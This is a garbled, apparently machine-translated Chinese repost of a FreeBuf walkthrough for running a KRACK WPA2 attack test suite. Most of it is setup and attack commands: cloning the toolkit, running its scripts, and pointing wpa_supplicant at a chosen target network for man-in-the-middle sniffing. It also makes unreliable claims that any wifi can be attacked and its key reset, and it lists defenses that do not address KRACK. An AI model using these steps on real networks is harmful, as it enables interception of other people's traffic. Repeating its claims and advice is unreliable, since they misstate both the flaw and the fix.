弹出连接提示弹出窗口后,可以输入任意密码位数。如果尝试连接,目标wifi会受到攻击,产生握手,目标wifi密钥会重置为您设置的密钥。在iphone上,可以看到有人在不停的连接和断开。此时连接成功,可以开始监听了。使用中间人技术,这里用iphone测试。Krack已经被曝光很久了,所以在11月3日写下这个张文,想起来就在freebuf上发表。
从事件开始到现在,一直没有攻击套件和张文。过程很简单,研究者可以理解。不鼓励恶意攻击者使用它,所以他们不会编写愚蠢的tou教程lan。当大多数用户还没有更新它的时候,他们仍然希望这个张文只会被用作研究(漏洞不是那么有害)
打开终端:
apt-get update apt-get install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptome
下载文件:
git克隆https://github.com/NoahhhRyan/krackattacks-test
CD krack攻击-测试-研究CD krack攻击
chmod 777 krack-ft-test.py
chmod 777 disable-hwcrypto.sh
。/disable-hwcrypto.sh
python krack-ft-test.py
设置network.conf文件,将目录中的“testnet”改为你要攻击的wifi名称。密码是随机的,保存在套件目录中:
最后执行以下命令,尝试连接目标开始攻击,等待结果。
sudo wpa _恳求者-D nl80211 -i wlan0 -c network.conf
那你也可以攻击任何wifi。在wifi列表中点击连接,可以看到攻击者在苹果手机上的热点栏中不断的连接和断开。在这里,我们测试了另一个wifi,效果是一样的。
防御方法
综上所述,提供临时解决方案,更改路由器默认用户名、密码和SSID,打开防火墙,关闭SSID广播,为自己的用户设置单独的SSID,彻底关闭DHCP。
伤害
其实不用那么担心。我们中国有wifi万能钥匙多少年了?他们比它强多了,我也没见你害怕过。。
谢谢大家。微博@ NoahhhRyan。
*作者:NoahhhRyan,转载请注明来自FreeBuf.COM。
1.《krack 国内研究人员首次Wifi重大漏洞利用实现|Krack攻击测试套件打包》援引自互联网,旨在传递更多网络信息知识,仅代表作者本人观点,与本网站无关,侵删请联系页脚下方联系方式。
2.《krack 国内研究人员首次Wifi重大漏洞利用实现|Krack攻击测试套件打包》仅供读者参考,本网站未对该内容进行证实,对其原创性、真实性、完整性、及时性不作任何保证。
3.文章转载时请保留本站内容来源地址,https://www.lu-xu.com/fangchan/1582178.html
